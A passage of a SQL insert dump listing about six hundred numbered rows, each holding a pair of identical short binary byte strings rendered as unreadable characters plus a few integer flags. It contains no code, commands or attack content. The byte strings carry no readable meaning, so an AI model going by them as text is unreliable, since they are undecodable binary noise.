(4822,'$\0a�\0\0�\0\0\0\0\n1p','$\0a�\0\0�\0\0\0\0\n1p',1,0,90,1),
(4823,'�\\�','�\\�',1,0,90,0),
(4824,'�','�',1,0,90,0),
(4825,'N/��','N/��',1,0,90,0),
(4826,'ޔ�','ޔ�',1,0,90,0),
(4827,'�}��','�}��',1,0,90,0),
(4828,'3��','3��',1,0,90,0),
(4829,'4�Ys','4�Ys',1,0,90,0),
(4830,'�wp�','�wp�',1,0,90,0),
(4831,'�As�','�As�',1,0,90,0),
(4832,'Q�#','Q�#',1,0,90,0),
(4833,'��','��',1,0,90,0),
(4834,'A��','A��',1,0,90,0),
(4835,'N.�','N.�',1,0,90,0),
(4836,'U��9','U��9',1,0,90,0),
(4837,'Յh&','Յh&',1,0,90,0),
(4838,'s��','s��',1,0,90,0),
(4839,'\"�h','\"�h',1,0,90,0),
(4840,'N.C','N.C',1,0,90,0),
(4841,'[�4�','[�4�',1,0,90,0),
(4842,'���','���',1,0,90,0),
(4843,'�(','�(',1,0,90,0),
(4844,'*G�\0\0\n\0\0\0\0\0\0\0\Z','*G�\0\0\n\0\0\0\0\0\0\0\Z',1,0,90,1),
(4845,'R���','R���',1,0,90,0),
(4846,'-\r�`','-\r�`',1,0,90,0),
(4847,'�1�','�1�',1,0,90,0),
(4848,'-]�','-]�',1,0,90,0),
(4849,'��','��',1,0,90,0),
(4850,'Վ�i','Վ�i',1,0,90,0),
(4851,'-]','-]',1,0,90,0),
(4852,'ó�','ó�',1,0,90,0),
(4853,'S��','S��',1,0,90,0),
(4854,'*G�\0\0\0\0\0\0\0\0\0\r','*G�\0\0\0\0\0\0\0\0\0\r',1,0,90,1),
(4855,'��PD','��PD',1,0,90,0),
(4856,'-WQy','-WQy',1,0,90,0),
(4857,'-]�','-]�',1,0,90,0),
(4858,'�\\�x','�\\�x',1,0,90,0),
(4859,'N.��','N.��',1,0,90,0),
(4860,'�~;','�~;',1,0,90,0),
(4861,'-Ov�','-Ov�',1,0,90,0),
(4862,'\"~x_','\"~x_',1,0,90,0),
(4863,'\rL=','\rL=',1,0,90,0),
(4864,'�F�[','�F�[',1,0,90,0),
(4865,'}�5�','}�5�',1,0,90,0),
(4866,'��Qq','��Qq',1,0,90,0),
(4867,'��IY','��IY',1,0,90,0),
(4868,'On0�','On0�',1,0,90,0),
(4869,' A�>\0\0\0\0\0\0\0\0',' A�>\0\0\0\0\0\0\0\0',1,0,90,1),
(4870,'(E��','(E��',1,0,90,0),
(4871,'&��\0\0�\0\0\0\0n`','&��\0\0�\0\0\0\0n`',1,0,90,1),
(4872,'e25','e25',1,0,90,0),
(4873,'� �','� �',1,0,90,0),
(4874,'�\ZzK','�\ZzK',1,0,90,0),
(4875,'��\'�','��\'�',1,0,90,0),
(4876,'�ǯ=','�ǯ=',1,0,90,0),
(4877,'��8\r','��8\r',1,0,90,0),
(4878,'m{�J','m{�J',1,0,90,0),
(4879,'&��\0\0�\0\0\0\0��','&��\0\0�\0\0\0\0��',1,0,90,1),
(4880,'��#','��#',1,0,90,0),
(4881,'(E�5','(E�5',1,0,90,0),
(4882,'Y.h�','Y.h�',1,0,90,0),
(4883,'��S9','��S9',1,0,90,0),
(4884,'l��>','l��>',1,0,90,0),
(4885,'AmB�','AmB�',1,0,90,0),
(4886,'�}+4','�}+4',1,0,90,0),
(4887,'���H','���H',1,0,90,0),
(4888,'t\0�','t\0�',1,0,90,0),
(4889,'�','�',1,0,90,0),
(4890,' A�\0қ\0\0\0\0\0\0\0',' A�\0қ\0\0\0\0\0\0\0',1,0,90,1),
(4891,'ޮ�','ޮ�',1,0,90,0),
(4892,'���','���',1,0,90,0),
(4893,'�t[^','�t[^',1,0,90,0),
(4894,'�(��','�(��',1,0,90,0),
(4895,'\\̄','\\̄',1,0,90,0),
(4896,'(p�=','(p�=',1,0,90,0),
(4897,'��p','��p',1,0,90,0),
(4898,'��S�','��S�',1,0,90,0),
(4899,'���I','���I',1,0,90,0),
(4900,'4�,7','4�,7',1,0,90,0),
(4901,'&��\0\0�\0\0\0\0!&�','&��\0\0�\0\0\0\0!&�',1,0,90,1),
(4902,'�]��','�]��',1,0,90,0),
(4903,'\rY��','\rY��',1,0,90,0),
(4904,'\"z�\r','\"z�\r',1,0,90,0),
(4905,'#�ƍ','#�ƍ',1,0,90,0),
(4906,'$�q�','$�q�',1,0,90,0),
(4907,'nZ�','nZ�',1,0,90,0),
(4908,'k�\r','k�\r',1,0,90,0),
(4909,'\"��8','\"��8',1,0,90,0),
(4910,'g��x','g��x',1,0,90,0),
(4911,'�H�I','�H�I',1,0,90,0),
(4912,'tv3','tv3',1,0,90,0),
(4913,'�YD{','�YD{',1,0,90,0),
(4914,'$H�E����������','$H�E����������',1,0,90,1),
(4915,'k�<','k�<',1,0,90,0),
(4916,'(\0�','(\0�',1,0,90,0),
(4917,'<��','<��',1,0,90,0),
(4918,'-�L�','-�L�',1,0,90,0),
(4919,'#��\'','#��\'',1,0,90,0),
(4920,'�i�','�i�',1,0,90,0),
(4921,',�n',',�n',1,0,90,0),
(4922,'�O��','�O��',1,0,90,0),
(4923,'/d\r4','/d\r4',1,0,90,0),
(4924,'h�N�','h�N�',1,0,90,0),
(4925,'\"�dN','\"�dN',1,0,90,0),
(4926,'{<�','{<�',1,0,90,0),
(4927,'/d]e','/d]e',1,0,90,0),
(4928,'\Z�','\Z�',1,0,90,0),
(4929,'g�\\\\','g�\\\\',1,0,90,0),
(4930,'���','���',1,0,90,0),
(4931,'gZ�','gZ�',1,0,90,0),
(4932,'k��','k��',1,0,90,0),
(4933,'2>Pi','2>Pi',1,0,90,0),
(4934,'yt','yt',1,0,90,0),
(4935,'k�m','k�m',1,0,90,0),
(4936,'���','���',1,0,90,0),
(4937,'-=��','-=��',1,0,90,0),
(4938,'�3�(','�3�(',1,0,90,0),
(4939,'���','���',1,0,90,0),
(4940,'�J�\n','�J�\n',1,0,90,0),
(4941,'x�','x�',1,0,90,0),
(4942,'{8ED','{8ED',1,0,90,0),
(4943,'�2�N','�2�N',1,0,90,0),
(4944,'g�� ','g�� ',1,0,90,0),
(4945,'g��-','g��-',1,0,90,0),
(4946,'��h','��h',1,0,90,0),
(4947,'D�݊','D�݊',1,0,90,0),
(4948,'k�\r\\','k�\r\\',1,0,90,0),
(4949,'g02�','g02�',1,0,90,0),
(4950,'e�B#','e�B#',1,0,90,0),
(4951,'5��','5��',1,0,90,0),
(4952,'pQ?S','pQ?S',1,0,90,0),
(4953,']Y�',']Y�',1,0,90,0),
(4954,'��\n','��\n',1,0,90,0),
(4955,'�:�','�:�',1,0,90,0),
(4956,'*o�\0\0F�M�����','*o�\0\0F�M�����',1,0,90,1),
(4957,'({�u','({�u',1,0,90,0),
(4958,'PXWU','PXWU',1,0,90,0),
(4959,'���','���',1,0,90,0),
(4960,'H�','H�',1,0,90,0),
(4961,'νQz','νQz',1,0,90,0),
(4962,'$\0��]��\0e\0','$\0��]��\0e\0',1,0,90,1),
(4963,'Xc��','Xc��',1,0,90,0),
(4964,'��','��',1,0,90,0),
(4965,'���','���',1,0,90,0),
(4966,'���','���',1,0,90,0),
(4967,'e*��','e*��',1,0,90,0),
(4968,'ӕ�9','ӕ�9',1,0,90,0),
(4969,'R�4','R�4',1,0,90,0),
(4970,'��j�','��j�',1,0,90,0),
(4971,'^f�','^f�',1,0,90,0),
(4972,'h+�\Z','h+�\Z',1,0,90,0),
(4973,'*G�\0�\0\0\0\0\0\0\0','*G�\0�\0\0\0\0\0\0\0',1,0,90,1),
(4974,'ӕ�','ӕ�',1,0,90,0),
(4975,'1�i=','1�i=',1,0,90,0),
(4976,'*�\0\0\0\0��3r\0V','*�\0\0\0\0��3r\0V',1,0,90,1),
(4977,'����','����',1,0,90,0),
(4978,' \r�;\0\n�\0\0\0\0\0\0',' \r�;\0\n�\0\0\0\0\0\0',1,0,90,1),
(4979,'(S*','(S*',1,0,90,0),
(4980,'\"�K�','\"�K�',1,0,90,0),
(4981,'\"��','\"��',1,0,90,0),
(4982,'g��Z','g��Z',1,0,90,0),
(4983,'��0','��0',1,0,90,0),
(4984,'�)��','�)��',1,0,90,0),
(4985,'ljw','ljw',1,0,90,0),
(4986,'Sۡ','Sۡ',1,0,90,0),
(4987,'g \0�','g \0�',1,0,90,0),
(4988,'R���','R���',1,0,90,0),
(4989,'�^Q�','�^Q�',1,0,90,0),
(4990,'\'e�R','\'e�R',1,0,90,0),
(4991,'*~\0\0\0\0\0�<������','*~\0\0\0\0\0�<������',1,0,90,1),
(4992,'£�','£�',1,0,90,0),
(4993,'gR�','gR�',1,0,90,0),
(4994,'��P�','��P�',1,0,90,0),
(4995,'D��M','D��M',1,0,90,0),
(4996,'e+��','e+��',1,0,90,0),
(4997,'|�,�','|�,�',1,0,90,0),
(4998,'��c2','��c2',1,0,90,0),
(4999,'/�c+','/�c+',1,0,90,0),
(5000,'g���','g���',1,0,90,0),
(5001,'(z�Q','(z�Q',1,0,90,0),
(5002,'�]�-','�]�-',1,0,90,0),
(5003,'1$G�','1$G�',1,0,90,0),
(5004,'*��','*��',1,0,90,0),
(5005,'+��\"','+��\"',1,0,90,0),
(5006,'gZ�S','gZ�S',1,0,90,0),
(5007,'+�R�','+�R�',1,0,90,0),
(5008,'H� T','H� T',1,0,90,0),
(5009,'.`X','.`X',1,0,90,0),
(5010,'�̰9','�̰9',1,0,90,0),
(5011,'g�2�','g�2�',1,0,90,0),
(5012,'g�_','g�_',1,0,90,0),
(5013,'�','�',1,0,90,0),
(5014,'$.�\0\0PV���fP','$.�\0\0PV���fP',1,0,90,1),
(5015,'>���','>���',1,0,90,0),
(5016,'\"K�','\"K�',1,0,90,0),
(5017,'g��','g��',1,0,90,0),
(5018,'(D\0\0\0\0\0\0\0\0\0\0!','(D\0\0\0\0\0\0\0\0\0\0!',1,0,90,1),
(5019,'u��','u��',1,0,90,0),
(5020,'*�p\0\0\0\0\0\0\0','*�p\0\0\0\0\0\0\0',1,0,90,1),
(5021,'h��','h��',1,0,90,0),
(5022,'12v\\','12v\\',1,0,90,0),
(5023,'���','���',1,0,90,0),
(5024,'gl�}','gl�}',1,0,90,0),
(5025,'$Hv','$Hv',1,0,90,0),
(5026,'��>','��>',1,0,90,0),
(5027,'/h�L','/h�L',1,0,90,0),
(5028,'qwF�','qwF�',1,0,90,0),
(5029,'���','���',1,0,90,0),
(5030,'/\\��','/\\��',1,0,90,0),
(5031,'�','�',1,0,90,0),
(5032,'=�#','=�#',1,0,90,0),
(5033,']�Z�',']�Z�',1,0,90,0),
(5034,'#�S&','#�S&',1,0,90,0),
(5035,'et�','et�',1,0,90,0),
(5036,'#�;�','#�;�',1,0,90,0),
(5037,'e+^�','e+^�',1,0,90,0),
(5038,'��\n3','��\n3',1,0,90,0),
(5039,'��O�','��O�',1,0,90,0),
(5040,'���&','���&',1,0,90,0),
(5041,'R��','R��',1,0,90,0),
(5042,'R���','R���',1,0,90,0),
(5043,'r��','r��',1,0,90,0),
(5044,'���','���',1,0,90,0),
(5045,'���','���',1,0,90,0),
(5046,'����','����',1,0,90,0),
(5047,'s��S','s��S',1,0,90,0),
(5048,' A�\02\0\0\0\0\0\0\0\0',' A�\02\0\0\0\0\0\0\0\0',1,0,90,1),
(5049,'z�|^','z�|^',1,0,90,0),
(5050,'o�f','o�f',1,0,90,0),
(5051,'N���','N���',1,0,90,0),
(5052,'S��','S��',1,0,90,0),
(5053,'C��','C��',1,0,90,0),
(5054,'3Y*','3Y*',1,0,90,0),
(5055,'��=','��=',1,0,90,0),
(5056,'g$l','g$l',1,0,90,0),
(5057,'�','�',1,0,90,0),
(5058,'��s','��s',1,0,90,0),
(5059,'gyZ�','gyZ�',1,0,90,0),
(5060,' �\0 ֮R����',' �\0 ֮R����',1,0,90,1),
(5061,'ۈ�a','ۈ�a',1,0,90,0),
(5062,'(V�','(V�',1,0,90,0),
(5063,'gR5','gR5',1,0,90,0),
(5064,'�6�=','�6�=',1,0,90,0),
(5065,'��S�','��S�',1,0,90,0),
(5066,'��t�','��t�',1,0,90,0),
(5067,'>f��','>f��',1,0,90,0),
(5068,'g\r��','g\r��',1,0,90,0),
(5069,'��AN','��AN',1,0,90,0),
(5070,'g�A�','g�A�',1,0,90,0),
(5071,'1��','1��',1,0,90,0),
(5072,'#�q�','#�q�',1,0,90,0),
(5073,'e\"|','e\"|',1,0,90,0),
(5074,'g���','g���',1,0,90,0),
(5075,'r��','r��',1,0,90,0),
(5076,'gj��','gj��',1,0,90,0),
(5077,'S�\0','S�\0',1,0,90,0),
(5078,'B�R','B�R',1,0,90,0),
(5079,'�(a�','�(a�',1,0,90,0),
(5080,'gyI ','gyI ',1,0,90,0),
(5081,'\"�_','\"�_',1,0,90,0),
(5082,'\"��','\"��',1,0,90,0),
(5083,'(S5','(S5',1,0,90,0),
(5084,'k��','k��',1,0,90,0),
(5085,'(MF�','(MF�',1,0,90,0),
(5086,'k�V','k�V',1,0,90,0),
(5087,'h-)-','h-)-',1,0,90,0),
(5088,'��q�','��q�',1,0,90,0),
(5089,'�悹','�悹',1,0,90,0),
(5090,'1��\0','1��\0',1,0,90,0),
(5091,'��u','��u',1,0,90,0),
(5092,'\"�p�','\"�p�',1,0,90,0),
(5093,'H�D�','H�D�',1,0,90,0),
(5094,'��Q�','��Q�',1,0,90,0),
(5095,'$�\0�����զ�`�','$�\0�����զ�`�',1,0,90,1),
(5096,'\\��','\\��',1,0,90,0),
(5097,'\\��','\\��',1,0,90,0),
(5098,'*G�\0\0 \0\0\0\0\0\0\0\r','*G�\0\0 \0\0\0\0\0\0\0\r',1,0,90,1),
(5099,'�6~','�6~',1,0,90,0),
(5100,'U��','U��',1,0,90,0),
(5101,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5102,'*G�\0\0\0\0\0\0\0\0\0\n','*G�\0\0\0\0\0\0\0\0\0\n',1,0,90,1),
(5103,'N/S�','N/S�',1,0,90,0),
(5104,'D��\r','D��\r',1,0,90,0),
(5105,'Kw�+','Kw�+',1,0,90,0),
(5106,'n���','n���',1,0,90,0),
(5107,'*G�\0\0\0\0\0\0\0\0\0\0=','*G�\0\0\0\0\0\0\0\0\0\0=',1,0,90,1),
(5108,'��d�','��d�',1,0,90,0),
(5109,'k�(:','k�(:',1,0,90,0),
(5110,'�q�f','�q�f',1,0,90,0),
(5111,'$^U','$^U',1,0,90,0),
(5112,'D��B','D��B',1,0,90,0),
(5113,'&S\00\0\0\0\0\0\0\02','&S\00\0\0\0\0\0\0\02',1,0,90,1),
(5114,'Vk�f','Vk�f',1,0,90,0),
(5115,'&�\0�\0\0\0\0&�','&�\0�\0\0\0\0&�',1,0,90,1),
(5116,'���','���',1,0,90,0),
(5117,'��','��',1,0,90,0),
(5118,'�H�_','�H�_',1,0,90,0),
(5119,'\"�\\>','\"�\\>',1,0,90,0),
(5120,'ْSd','ْSd',1,0,90,0),
(5121,'#�vJ','#�vJ',1,0,90,0),
(5122,'\"I��','\"I��',1,0,90,0),
(5123,'�\0��','�\0��',1,0,90,0),
(5124,'H�O�','H�O�',1,0,90,0),
(5125,'(Mo�','(Mo�',1,0,90,0),
(5126,'�E�9','�E�9',1,0,90,0),
(5127,'E','E',1,0,90,0),
(5128,'g\r�l','g\r�l',1,0,90,0),
(5129,'�#��','�#��',1,0,90,0),
(5130,'*G�\0��^oi���z�','*G�\0��^oi���z�',1,0,90,1),
(5131,'ó�g','ó�g',1,0,90,0),
(5132,'R���','R���',1,0,90,0),
(5133,'�ӊ','�ӊ',1,0,90,0),
(5134,'���','���',1,0,90,0),
(5135,'��B�','��B�',1,0,90,0),
(5136,'���','���',1,0,90,0),
(5137,'��B','��B',1,0,90,0),
(5138,'*G�\0\0\0\0\0\0\0\0\0\0/','*G�\0\0\0\0\0\0\0\0\0\0/',1,0,90,1),
(5139,'��#','��#',1,0,90,0),
(5140,'��.n','��.n',1,0,90,0),
(5141,'�eO','�eO',1,0,90,0),
(5142,'mj�\0','mj�\0',1,0,90,0),
(5143,'*G�\0��^��R�','*G�\0��^��R�',1,0,90,1),
(5144,'*G�\0\n\0\0\0\0\0\0\0\0','*G�\0\n\0\0\0\0\0\0\0\0',1,0,90,1),
(5145,'*G�\0\0 \0\0\0\0\0\0\0$','*G�\0\0 \0\0\0\0\0\0\0$',1,0,90,1),
(5146,'-T��','-T��',1,0,90,0),
(5147,'�\\�','�\\�',1,0,90,0),
(5148,'�H','�H',1,0,90,0),
(5149,'-WP�','-WP�',1,0,90,0),
(5150,'g�x�','g�x�',1,0,90,0),
(5151,'(z��','(z��',1,0,90,0),
(5152,'�cY�','�cY�',1,0,90,0),
(5153,'[y��','[y��',1,0,90,0),
(5154,'��Y�','��Y�',1,0,90,0),
(5155,'Y>�','Y>�',1,0,90,0),
(5156,'v:�','v:�',1,0,90,0),
(5157,'�땵','�땵',1,0,90,0),
(5158,'��y','��y',1,0,90,0),
(5159,'��ۧ','��ۧ',1,0,90,0),
(5160,']{v�',']{v�',1,0,90,0),
(5161,'��Z','��Z',1,0,90,0),
(5162,'�4�','�4�',1,0,90,0),
(5163,'�FL+','�FL+',1,0,90,0),
(5164,' K��\0�\0\0\0\0\0\0\0',' K��\0�\0\0\0\0\0\0\0',1,0,90,1),
(5165,'�Tl�','�Tl�',1,0,90,0),
(5166,'��w','��w',1,0,90,0),
(5167,'-=�\Z','-=�\Z',1,0,90,0),
(5168,'4�[�','4�[�',1,0,90,0),
(5169,'(N��','(N��',1,0,90,0),
(5170,'(N�n','(N�n',1,0,90,0),
(5171,'�V@�','�V@�',1,0,90,0),
(5172,'\\�UI','\\�UI',1,0,90,0),
(5173,'On0�','On0�',1,0,90,0),
(5174,'�X�L','�X�L',1,0,90,0),
(5175,'-=�g','-=�g',1,0,90,0),
(5176,'(S9','(S9',1,0,90,0),
(5177,'�K1','�K1',1,0,90,0),
(5178,'(zD�','(zD�',1,0,90,0),
(5179,'W���','W���',1,0,90,0),
(5180,'����','����',1,0,90,0),
(5181,'(N��','(N��',1,0,90,0),
(5182,'4��o','4��o',1,0,90,0),
(5183,'LjG','LjG',1,0,90,0),
(5184,'z�','z�',1,0,90,0),
(5185,'(z��','(z��',1,0,90,0),
(5186,' A�\0��\0\0\0\0\0\0\0\0',' A�\0��\0\0\0\0\0\0\0\0',1,0,90,1),
(5187,'b6#','b6#',1,0,90,0),
(5188,'��ۢ','��ۢ',1,0,90,0),
(5189,'4�[�','4�[�',1,0,90,0),
(5190,'*� Rt\0\0\0\0\0\0\0','*� Rt\0\0\0\0\0\0\0',1,0,90,1),
(5191,'�c>o','�c>o',1,0,90,0),
(5192,'�?GH','�?GH',1,0,90,0),
(5193,'(N��','(N��',1,0,90,0),
(5194,'�/�','�/�',1,0,90,0),
(5195,'-=�\Z','-=�\Z',1,0,90,0),
(5196,' A�\0�p\0\0\0\0\0\0\0\0',' A�\0�p\0\0\0\0\0\0\0\0',1,0,90,1),
(5197,'(z�<','(z�<',1,0,90,0),
(5198,'�V{#','�V{#',1,0,90,0),
(5199,'-=�','-=�',1,0,90,0),
(5200,'(S8�','(S8�',1,0,90,0),
(5201,'(S<&','(S<&',1,0,90,0),
(5202,'W��v','W��v',1,0,90,0),
(5203,'- �y','- �y',1,0,90,0),
(5204,'��75','��75',1,0,90,0),
(5205,'�VpB','�VpB',1,0,90,0),
(5206,'U��','U��',1,0,90,0),
(5207,'\"�s�','\"�s�',1,0,90,0),
(5208,'k�.','k�.',1,0,90,0),
(5209,'h+�','h+�',1,0,90,0),
(5210,'\\�5U','\\�5U',1,0,90,0),
(5211,'�5','�5',1,0,90,0),
(5212,'��\0','��\0',1,0,90,0),
(5213,'Ala','Ala',1,0,90,0),
(5214,'D���','D���',1,0,90,0),
(5215,'-M�y','-M�y',1,0,90,0),
(5216,' �KT\0���S',' �KT\0���S',1,0,90,1),
(5217,'�*N�','�*N�',1,0,90,0),
(5218,' �p�T\0��L��',' �p�T\0��L��',1,0,90,1),
(5219,'.ia�','.ia�',1,0,90,0),
(5220,'�87j','�87j',1,0,90,0),
(5221,'�Q�','�Q�',1,0,90,0),
(5222,'\"~IV','\"~IV',1,0,90,0),
(5223,'��L�','��L�',1,0,90,0),
(5224,'��B','��B',1,0,90,0),
(5225,'��','��',1,0,90,0),
(5226,'�hH�','�hH�',1,0,90,0),
(5227,'�VvN','�VvN',1,0,90,0),
(5228,' �\0(s����',' �\0(s����',1,0,90,1),
(5229,'����','����',1,0,90,0),
(5230,'���','���',1,0,90,0),
(5231,'k�j','k�j',1,0,90,0),
(5232,'���m','���m',1,0,90,0),
(5233,'�Z�','�Z�',1,0,90,0),
(5234,'*@�\0\0\0\0���\0 �','*@�\0\0\0\0���\0 �',1,0,90,1),
(5235,'#Ե�','#Ե�',1,0,90,0),
(5236,'h�)�','h�)�',1,0,90,0),
(5237,'��<�','��<�',1,0,90,0),
(5238,'��','��',1,0,90,0),
(5239,'�[s�','�[s�',1,0,90,0),
(5240,'\"Vz�','\"Vz�',1,0,90,0),
(5241,'��Z�','��Z�',1,0,90,0),
(5242,'*��\0\0�\0\0\0\0А','*��\0\0�\0\0\0\0А',1,0,90,1),
(5243,'��r','��r',1,0,90,0),
(5244,'��}','��}',1,0,90,0),
(5245,'��v','��v',1,0,90,0),
(5246,'6�E','6�E',1,0,90,0),
(5247,'��\0K','��\0K',1,0,90,0),
(5248,'3Y�+','3Y�+',1,0,90,0),
(5249,'>mU','>mU',1,0,90,0),
(5250,'�h�','�h�',1,0,90,0),
(5251,'��,�','��,�',1,0,90,0),
(5252,'\\�/�','\\�/�',1,0,90,0),
(5253,'��','��',1,0,90,0),
(5254,'=�#','=�#',1,0,90,0),
(5255,'ĽpI','ĽpI',1,0,90,0),
(5256,'-�','-�',1,0,90,0),
(5257,'��n','��n',1,0,90,0),
(5258,'\"���','\"���',1,0,90,0),
(5259,'��{�','��{�',1,0,90,0),
(5260,'�Z�Y','�Z�Y',1,0,90,0),
(5261,'\"��[','\"��[',1,0,90,0),
(5262,'�h��','�h��',1,0,90,0),
(5263,'�LK�','�LK�',1,0,90,0),
(5264,'�ǩ�','�ǩ�',1,0,90,0),
(5265,'+�!H','+�!H',1,0,90,0),
(5266,'(S�','(S�',1,0,90,0),
(5267,'*�\0*%%\0\0\0\0\0\0\0','*�\0*%%\0\0\0\0\0\0\0',1,0,90,1),
(5268,'Yd�','Yd�',1,0,90,0),
(5269,'��','��',1,0,90,0),
(5270,'.�)�','.�)�',1,0,90,0),
(5271,'��2�','��2�',1,0,90,0),
(5272,'��Hl','��Hl',1,0,90,0),
(5273,' \r�{\0\0\0\0\0\0\0\0*',' \r�{\0\0\0\0\0\0\0\0*',1,0,90,1),
(5274,'+�z�','+�z�',1,0,90,0),
(5275,'s��','s��',1,0,90,0),
(5276,'*����\0\0\0\0\0\0\0','*����\0\0\0\0\0\0\0',1,0,90,1),
(5277,'g$�','g$�',1,0,90,0),
(5278,'��w','��w',1,0,90,0),
(5279,'%���','%���',1,0,90,0),
(5280,'h+��','h+��',1,0,90,0),
(5281,'���','���',1,0,90,0),
(5282,'��','��',1,0,90,0),
(5283,'�8�+','�8�+',1,0,90,0),
(5284,'��f','��f',1,0,90,0),
(5285,'w*��','w*��',1,0,90,0),
(5286,'D��','D��',1,0,90,0),
(5287,'£��','£��',1,0,90,0),
(5288,'���<','���<',1,0,90,0),
(5289,'g5��','g5��',1,0,90,0),
(5290,'/\\I','/\\I',1,0,90,0),
(5291,'\"J��','\"J��',1,0,90,0),
(5292,'����','����',1,0,90,0),
(5293,'��x','��x',1,0,90,0),
(5294,'z�K�','z�K�',1,0,90,0),
(5295,' �b�mW��\0\0',' �b�mW��\0\0',1,0,90,1),
(5296,'M�>C','M�>C',1,0,90,0),
(5297,'���','���',1,0,90,0),
(5298,'(q�F','(q�F',1,0,90,0),
(5299,']k\'�',']k\'�',1,0,90,0),
(5300,'\'lГ','\'lГ',1,0,90,0),
(5301,'\rY<�','\rY<�',1,0,90,0),
(5302,'&��\0�\0\0\0\0�0\0','&��\0�\0\0\0\0�0\0',1,0,90,1),
(5303,'���','���',1,0,90,0),
(5304,'=�&','=�&',1,0,90,0),
(5305,'��s','��s',1,0,90,0),
(5306,'QX4�','QX4�',1,0,90,0),
(5307,'E�Q','E�Q',1,0,90,0),
(5308,'&\0s�\0���k[','&\0s�\0���k[',1,0,90,1),
(5309,'��|','��|',1,0,90,0),
(5310,'/_v','/_v',1,0,90,0),
(5311,'�g','�g',1,0,90,0),
(5312,'�HՒ','�HՒ',1,0,90,0),
(5313,'��%�','��%�',1,0,90,0),
(5314,'g$�','g$�',1,0,90,0),
(5315,' \r�{\0\0\0\0\0\0\0\00',' \r�{\0\0\0\0\0\0\0\00',1,0,90,1),
(5316,'\"K��','\"K��',1,0,90,0),
(5317,'/m6','/m6',1,0,90,0),
(5318,'g�t<','g�t<',1,0,90,0),
(5319,'N�.z','N�.z',1,0,90,0),
(5320,'�k� ','�k� ',1,0,90,0),
(5321,'��','��',1,0,90,0),
(5322,'g*8�','g*8�',1,0,90,0),
(5323,'[�f�','[�f�',1,0,90,0),
(5324,'\"~X','\"~X',1,0,90,0),
(5325,'g�','g�',1,0,90,0),
(5326,'/`]�','/`]�',1,0,90,0),
(5327,'gj��','gj��',1,0,90,0),
(5328,'&\n\0\0�о?�_(/','&\n\0\0�о?�_(/',1,0,90,1),
(5329,'g��c','g��c',1,0,90,0),
(5330,'D��','D��',1,0,90,0),
(5331,'���','���',1,0,90,0),
(5332,'{k','{k',1,0,90,0),
(5333,'��','��',1,0,90,0),
(5334,'�fn�','�fn�',1,0,90,0),
(5335,'���','���',1,0,90,0),
(5336,'���','���',1,0,90,0),
(5337,'=��','=��',1,0,90,0),
(5338,'\"�\\�','\"�\\�',1,0,90,0),
(5339,'��V','��V',1,0,90,0),
(5340,'��U�','��U�',1,0,90,0),
(5341,'�Ӊ�','�Ӊ�',1,0,90,0),
(5342,'4Hv','4Hv',1,0,90,0),
(5343,'^�/A','^�/A',1,0,90,0),
(5344,'��Z}','��Z}',1,0,90,0),
(5345,'��V','��V',1,0,90,0),
(5346,'\"�F','\"�F',1,0,90,0),
(5347,'νS','νS',1,0,90,0),
(5348,'ν�B','ν�B',1,0,90,0),
(5349,'�:�N','�:�N',1,0,90,0),
(5350,'h��J','h��J',1,0,90,0),
(5351,'k��','k��',1,0,90,0),
(5352,'\"Iv\\','\"Iv\\',1,0,90,0),
(5353,'k�c','k�c',1,0,90,0),
(5354,'\"K�{','\"K�{',1,0,90,0),
(5355,'�b:4','�b:4',1,0,90,0),
(5356,'\"}�','\"}�',1,0,90,0),
(5357,'�V[�','�V[�',1,0,90,0),
(5358,'��r','��r',1,0,90,0),
(5359,'D���','D���',1,0,90,0),
(5360,'\"��F','\"��F',1,0,90,0),
(5361,'�r�<','�r�<',1,0,90,0),
(5362,'�K�k','�K�k',1,0,90,0),
(5363,'�P0b','�P0b',1,0,90,0),
(5364,'��|','��|',1,0,90,0),
(5365,'.eUT','.eUT',1,0,90,0),
(5366,'��(�','��(�',1,0,90,0),
(5367,'��^','��^',1,0,90,0),
(5368,'#�*H','#�*H',1,0,90,0),
(5369,'�W%','�W%',1,0,90,0),
(5370,'\"��o','\"��o',1,0,90,0),
(5371,'�ƾs','�ƾs',1,0,90,0),
(5372,'νY\'','νY\'',1,0,90,0),
(5373,'�Ǯf','�Ǯf',1,0,90,0),
(5374,'�ǧ1','�ǧ1',1,0,90,0),
(5375,'(z��','(z��',1,0,90,0),
(5376,'(N��','(N��',1,0,90,0),
(5377,'ex�','ex�',1,0,90,0),
(5378,'(N�\r','(N�\r',1,0,90,0),
(5379,'-��','-��',1,0,90,0),
(5380,'-=�n','-=�n',1,0,90,0),
(5381,'l��','l��',1,0,90,0),
(5382,'��4�','��4�',1,0,90,0),
(5383,'���','���',1,0,90,0),
(5384,'��n','��n',1,0,90,0),
(5385,'��A$','��A$',1,0,90,0),
(5386,'�X��','�X��',1,0,90,0),
(5387,'��%','��%',1,0,90,0),
(5388,'[���','[���',1,0,90,0),
(5389,'��e�','��e�',1,0,90,0),
(5390,'��Q@','��Q@',1,0,90,0),
(5391,'(S=�','(S=�',1,0,90,0),
(5392,'(M]','(M]',1,0,90,0),
(5393,'�R\\�','�R\\�',1,0,90,0),
(5394,'H��','H��',1,0,90,0),
(5395,'�Fp','�Fp',1,0,90,0),
(5396,'�#','�#',1,0,90,0),
(5397,'��|','��|',1,0,90,0),
(5398,'h���','h���',1,0,90,0),
(5399,'�X�Y','�X�Y',1,0,90,0),
(5400,'\rO]','\rO]',1,0,90,0),
(5401,'4�˖','4�˖',1,0,90,0),
(5402,'��Q�','��Q�',1,0,90,0),
(5403,'h+�o','h+�o',1,0,90,0),
(5404,'��3�','��3�',1,0,90,0),
(5405,'�ǂ�','�ǂ�',1,0,90,0),
(5406,'�a�0','�a�0',1,0,90,0),
(5407,'J��/','J��/',1,0,90,0),
(5408,'(M3\'','(M3\'',1,0,90,0),
(5409,'(N�B','(N�B',1,0,90,0),
(5410,'(M6�','(M6�',1,0,90,0),
(5411,'s���','s���',1,0,90,0),
(5412,'���','���',1,0,90,0),
(5413,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5414,'9��','9��',1,0,90,0),
(5415,'x�','x�',1,0,90,0),
(5416,'E�.','E�.',1,0,90,0),
(5417,'�_�','�_�',1,0,90,0),
(5418,'��n','��n',1,0,90,0),
(5419,'%d�','%d�',1,0,90,0),
(5420,'���X','���X',1,0,90,0),
(5421,'��|','��|',1,0,90,0),
(5422,'��','��',1,0,90,0),
(5423,'2�1','2�1',1,0,90,0),
(5424,'\"��','\"��',1,0,90,0),
